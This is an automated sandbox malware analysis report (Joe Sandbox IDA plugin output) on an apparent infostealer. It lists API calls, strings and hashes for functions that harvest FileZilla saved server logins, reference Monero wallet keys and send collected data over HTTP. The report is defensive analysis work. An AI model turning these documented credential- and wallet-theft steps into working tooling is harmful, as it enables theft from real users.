GetProcAddress.KERNEL32(73B30000,0124B9C8), ref: 0077A160
GetProcAddress.KERNEL32(73B30000,01245480), ref: 0077A179
GetProcAddress.KERNEL32(73B30000,0124B928), ref: 0077A191
GetProcAddress.KERNEL32(73B30000,0125D238), ref: 0077A1A9
GetProcAddress.KERNEL32(73B30000,0125D220), ref: 0077A1C2
GetProcAddress.KERNEL32(73B30000,012454A0), ref: 0077A1DA
GetProcAddress.KERNEL32(73B30000,01245400), ref: 0077A1F2
GetProcAddress.KERNEL32(73B30000,0125D280), ref: 0077A20B
GetProcAddress.KERNEL32(757E0000,012451E0), ref: 0077A22C
GetProcAddress.KERNEL32(757E0000,01245200), ref: 0077A244
GetProcAddress.KERNEL32(757E0000,0125D310), ref: 0077A25D
GetProcAddress.KERNEL32(757E0000,0125D208), ref: 0077A275
GetProcAddress.KERNEL32(757E0000,012451C0), ref: 0077A28D
GetProcAddress.KERNEL32(758D0000,0124B950), ref: 0077A2B3
GetProcAddress.KERNEL32(758D0000,0124B900), ref: 0077A2CB
GetProcAddress.KERNEL32(758D0000,0125D178), ref: 0077A2E3
GetProcAddress.KERNEL32(758D0000,01245500), ref: 0077A2FC
GetProcAddress.KERNEL32(758D0000,01245340), ref: 0077A314
GetProcAddress.KERNEL32(758D0000,0124B860), ref: 0077A32C
GetProcAddress.KERNEL32(76BE0000,0125D250), ref: 0077A352
GetProcAddress.KERNEL32(76BE0000,012454C0), ref: 0077A36A
GetProcAddress.KERNEL32(76BE0000,01259228), ref: 0077A382
GetProcAddress.KERNEL32(76BE0000,0125D1A8), ref: 0077A39B
GetProcAddress.KERNEL32(76BE0000,0125D400), ref: 0077A3B3
GetProcAddress.KERNEL32(76BE0000,012453C0), ref: 0077A3CB
GetProcAddress.KERNEL32(76BE0000,01245380), ref: 0077A3E4
GetProcAddress.KERNEL32(76BE0000,0125D148), ref: 0077A3FC
GetProcAddress.KERNEL32(76BE0000,0125D1C0), ref: 0077A414
GetProcAddress.KERNEL32(75670000,01245420), ref: 0077A436
GetProcAddress.KERNEL32(75670000,0125D1D8), ref: 0077A44E
GetProcAddress.KERNEL32(75670000,0125D268), ref: 0077A466
GetProcAddress.KERNEL32(75670000,0125D298), ref: 0077A47F
GetProcAddress.KERNEL32(75670000,0125D2E0), ref: 0077A497
GetProcAddress.KERNEL32(759D0000,012453A0), ref: 0077A4B8
GetProcAddress.KERNEL32(759D0000,01245240), ref: 0077A4D1
GetProcAddress.KERNEL32(76D80000,01245520), ref: 0077A4F2
GetProcAddress.KERNEL32(76D80000,0125D430), ref: 0077A50A
GetProcAddress.KERNEL32(6F5C0000,012454E0), ref: 0077A530
GetProcAddress.KERNEL32(6F5C0000,01245260), ref: 0077A548
GetProcAddress.KERNEL32(6F5C0000,01245280), ref: 0077A560
GetProcAddress.KERNEL32(6F5C0000,0125D160), ref: 0077A579
GetProcAddress.KERNEL32(6F5C0000,01245440), ref: 0077A591
GetProcAddress.KERNEL32(6F5C0000,012451A0), ref: 0077A5A9
GetProcAddress.KERNEL32(6F5C0000,01245360), ref: 0077A5C2
GetProcAddress.KERNEL32(6F5C0000,012452A0), ref: 0077A5DA
GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 0077A5F1
GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 0077A607
GetProcAddress.KERNEL32(75480000,0125D418), ref: 0077A629
GetProcAddress.KERNEL32(75480000,01259168), ref: 0077A641
GetProcAddress.KERNEL32(75480000,0125D190), ref: 0077A659
GetProcAddress.KERNEL32(75480000,0125D328), ref: 0077A672
GetProcAddress.KERNEL32(753B0000,01245540), ref: 0077A693
GetProcAddress.KERNEL32(6FF20000,0125D1F0), ref: 0077A6B4
GetProcAddress.KERNEL32(6FF20000,012452E0), ref: 0077A6CD
GetProcAddress.KERNEL32(6FF20000,0125D340), ref: 0077A6E5
GetProcAddress.KERNEL32(6FF20000,0125D358), ref: 0077A6FD

Strings

HttpQueryInfoA, xrefs: 0077A5FC
InternetSetOptionA, xrefs: 0077A5E5

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: b9b5debf92e74420398b3dc6ae53e1cdcaa416b87959a5a264ae0b3aa21ea69d
Instruction ID: 293eb410e486daf57ec3ada5bb73911f5531c4d676f0fb31b3cedbe96c9e191c
Opcode Fuzzy Hash: b9b5debf92e74420398b3dc6ae53e1cdcaa416b87959a5a264ae0b3aa21ea69d
Instruction Fuzzy Hash: 2F625CB5928210AFC795DFA8ED8896637F9FF8E705304851AA609C3234D7399841FFD2

Function 00767710 Relevance: 96.8, APIs: 54, Strings: 1, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,ogle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com<br), ref: 00767724
RtlAllocateHeap.NTDLL(00000000), ref: 0076772B
lstrcat.KERNEL32(?,01259E20), ref: 007678DB
lstrcat.KERNEL32(?,?), ref: 007678EF
lstrcat.KERNEL32(?,?), ref: 00767903
lstrcat.KERNEL32(?,?), ref: 00767917
lstrcat.KERNEL32(?,0125E338), ref: 0076792B
lstrcat.KERNEL32(?,0125E398), ref: 0076793F
lstrcat.KERNEL32(?,0125E3B0), ref: 00767952
lstrcat.KERNEL32(?,0125E428), ref: 00767966
lstrcat.KERNEL32(?,01248598), ref: 0076797A
lstrcat.KERNEL32(?,?), ref: 0076798E
lstrcat.KERNEL32(?,?), ref: 007679A2
lstrcat.KERNEL32(?,?), ref: 007679B6
lstrcat.KERNEL32(?,0125E338), ref: 007679C9
lstrcat.KERNEL32(?,0125E398), ref: 007679DD
lstrcat.KERNEL32(?,0125E3B0), ref: 007679F1
lstrcat.KERNEL32(?,0125E428), ref: 00767A04
lstrcat.KERNEL32(?,01248AE0), ref: 00767A18
lstrcat.KERNEL32(?,?), ref: 00767A2C
lstrcat.KERNEL32(?,?), ref: 00767A40
lstrcat.KERNEL32(?,?), ref: 00767A54
lstrcat.KERNEL32(?,0125E338), ref: 00767A68
lstrcat.KERNEL32(?,0125E398), ref: 00767A7B
lstrcat.KERNEL32(?,0125E3B0), ref: 00767A8F
lstrcat.KERNEL32(?,0125E428), ref: 00767AA3
lstrcat.KERNEL32(?,01248808), ref: 00767AB6
lstrcat.KERNEL32(?,?), ref: 00767ACA
lstrcat.KERNEL32(?,?), ref: 00767ADE
lstrcat.KERNEL32(?,?), ref: 00767AF2
lstrcat.KERNEL32(?,0125E338), ref: 00767B06
lstrcat.KERNEL32(?,0125E398), ref: 00767B1A
lstrcat.KERNEL32(?,0125E3B0), ref: 00767B2D
lstrcat.KERNEL32(?,0125E428), ref: 00767B41
lstrcat.KERNEL32(?,01248A78), ref: 00767B55
lstrcat.KERNEL32(?,?), ref: 00767B69
lstrcat.KERNEL32(?,?), ref: 00767B7D
lstrcat.KERNEL32(?,?), ref: 00767B91
lstrcat.KERNEL32(?,0125E338), ref: 00767BA4
lstrcat.KERNEL32(?,0125E398), ref: 00767BB8
lstrcat.KERNEL32(?,0125E3B0), ref: 00767BCC
lstrcat.KERNEL32(?,0125E428), ref: 00767BDF
lstrcat.KERNEL32(?,012486D0), ref: 00767BF3
lstrcat.KERNEL32(?,?), ref: 00767C07
lstrcat.KERNEL32(?,?), ref: 00767C1B
lstrcat.KERNEL32(?,?), ref: 00767C2F
lstrcat.KERNEL32(?,0125E338), ref: 00767C43
lstrcat.KERNEL32(?,0125E398), ref: 00767C56
lstrcat.KERNEL32(?,0125E3B0), ref: 00767C6A
lstrcat.KERNEL32(?,0125E428), ref: 00767C7E

Part of subcall function 007675D0: lstrcat.KERNEL32(3594A020,007817FC), ref: 00767606
Part of subcall function 007675D0: lstrcat.KERNEL32(3594A020,00000000), ref: 00767648
Part of subcall function 007675D0: lstrcat.KERNEL32(3594A020, : ), ref: 0076765A
Part of subcall function 007675D0: lstrcat.KERNEL32(3594A020,00000000), ref: 0076768F
Part of subcall function 007675D0: lstrcat.KERNEL32(3594A020,00781804), ref: 007676A0
Part of subcall function 007675D0: lstrcat.KERNEL32(3594A020,00000000), ref: 007676D3
Part of subcall function 007675D0: lstrcat.KERNEL32(3594A020,00781808), ref: 007676ED
Part of subcall function 007675D0: task.LIBCPMTD ref: 007676FB

lstrcat.KERNEL32(?,0125E968), ref: 00767E0B
lstrcat.KERNEL32(?,0125D6D0), ref: 00767E1E
lstrlen.KERNEL32(3594A020), ref: 00767E2B
lstrlen.KERNEL32(3594A020), ref: 00767E3B

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Strings

ogle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com<br, xrefs: 0076771D

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID: ogle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com<br
API String ID: 928082926-1474879917
Opcode ID: 8fc07a622ce398b39cb39e7d9e7a7934a5666057da5e2bc714435b835afc999e
Instruction ID: d92579802d9c2a1000299414e17293286e6416e61aef2c4a0b62e13290ae5aed
Opcode Fuzzy Hash: 8fc07a622ce398b39cb39e7d9e7a7934a5666057da5e2bc714435b835afc999e
Instruction Fuzzy Hash: 9D3211B2814314ABCB55EBA0DC89DEA737CBB45700F444689F21E62091DF78EB85DF92

Function 00770250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 00778DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007699EC
Part of subcall function 007699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00769A11
Part of subcall function 007699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00769A31
Part of subcall function 007699C0: ReadFile.KERNEL32(000000FF,?,00000000,0076148F,00000000), ref: 00769A5A
Part of subcall function 007699C0: LocalFree.KERNEL32(0076148F), ref: 00769A90
Part of subcall function 007699C0: CloseHandle.KERNEL32(000000FF), ref: 00769A9A

Part of subcall function 00778E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00778E52

GetProcessHeap.KERNEL32(00000000,000F423F,00780DBA,00780DB7,00780DB6,00780DB3), ref: 00770362
RtlAllocateHeap.NTDLL(00000000), ref: 00770369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00770385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 00770393
StrStrA.SHLWAPI(00000000,<Port>), ref: 007703CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 007703DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00770419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 00770427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00770463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 00770475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 00770502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 0077051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 00770532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 0077054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00770562
lstrcat.KERNEL32(?,profile: null), ref: 00770571
lstrcat.KERNEL32(?,url: ), ref: 00770580
lstrcat.KERNEL32(?,00000000), ref: 00770593
lstrcat.KERNEL32(?,00781678), ref: 007705A2
lstrcat.KERNEL32(?,00000000), ref: 007705B5
lstrcat.KERNEL32(?,0078167C), ref: 007705C4
lstrcat.KERNEL32(?,login: ), ref: 007705D3
lstrcat.KERNEL32(?,00000000), ref: 007705E6
lstrcat.KERNEL32(?,00781688), ref: 007705F5
lstrcat.KERNEL32(?,password: ), ref: 00770604
lstrcat.KERNEL32(?,00000000), ref: 00770617
lstrcat.KERNEL32(?,00781698), ref: 00770626
lstrcat.KERNEL32(?,0078169C), ref: 00770635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00780DB2), ref: 0077068E

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 007702A4
<Pass encoding="base64">, xrefs: 0077045A
profile: null, xrefs: 00770568
login: , xrefs: 007705CA
<User>, xrefs: 00770410
<Port>, xrefs: 007703C6
password: , xrefs: 007705FB
url: , xrefs: 00770577
browser: FileZilla, xrefs: 00770559
<Host>, xrefs: 0077037C

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: fa2d39a00e1f96b14db1bd3f4a9195c5e3b31343632665cc10ee8d008b97b212
Instruction ID: e38d8a3457535c383b53c06643ccdbe9a83ac7f259bcf9c8b9b9fb90f1abaa65
Opcode Fuzzy Hash: fa2d39a00e1f96b14db1bd3f4a9195c5e3b31343632665cc10ee8d008b97b212
Instruction Fuzzy Hash: DCD11E71950108EBDF04FBF4DD9AEEE7378AF54340F548418F106A6095EF78AA06DBA2

Function 00765100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00764839
Part of subcall function 007647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00764849

lstrlen.KERNEL32(00000000), ref: 00765193

Part of subcall function 00778EA0: CryptBinaryToStringA.CRYPT32(00000000,00765184,40000001,00000000,00000000,?,00765184), ref: 00778EC0

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00765207
StrCmpCA.SHLWAPI(?,0125E978), ref: 00765225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00765340
HttpOpenRequestA.WININET(00000000,0125EAC8,?,0125E230,00000000,00000000,00400100,00000000), ref: 007653A4

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0125E938,00000000,?,0125AA70,00000000,?,007819DC,00000000,?,007751CF), ref: 00765737
lstrlen.KERNEL32(00000000), ref: 0076574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0076575C
RtlAllocateHeap.NTDLL(00000000), ref: 00765763
lstrlen.KERNEL32(00000000), ref: 00765778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007657A9
lstrlen.KERNEL32(00000000), ref: 007657C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007657E1
lstrlen.KERNEL32(00000000,?,?), ref: 0076580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00765822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0076584D
InternetCloseHandle.WININET(00000000), ref: 007658B1
InternetCloseHandle.WININET(00000000), ref: 007658BE
InternetCloseHandle.WININET(00000000), ref: 007658C8

Strings

------, xrefs: 007654F9
------, xrefs: 00765297
", xrefs: 00765482
------, xrefs: 0076563B
--, xrefs: 00765280
------, xrefs: 007653B7
", xrefs: 00765706
", xrefs: 007655C4

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: cb43da371098b3a4e78a8fe45584cf86229cc8e458f3903da956d3e6a84932de
Instruction ID: a5d5c69a18fa3c0f6911794611cacc4468227adad139d88800cfb45262ed3e40
Opcode Fuzzy Hash: cb43da371098b3a4e78a8fe45584cf86229cc8e458f3903da956d3e6a84932de
Instruction Fuzzy Hash: 6632EF71920118FBEF15EBA0DC99FEE7378BF94740F408169B11A62091DF786A49CF92

Function 0076A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
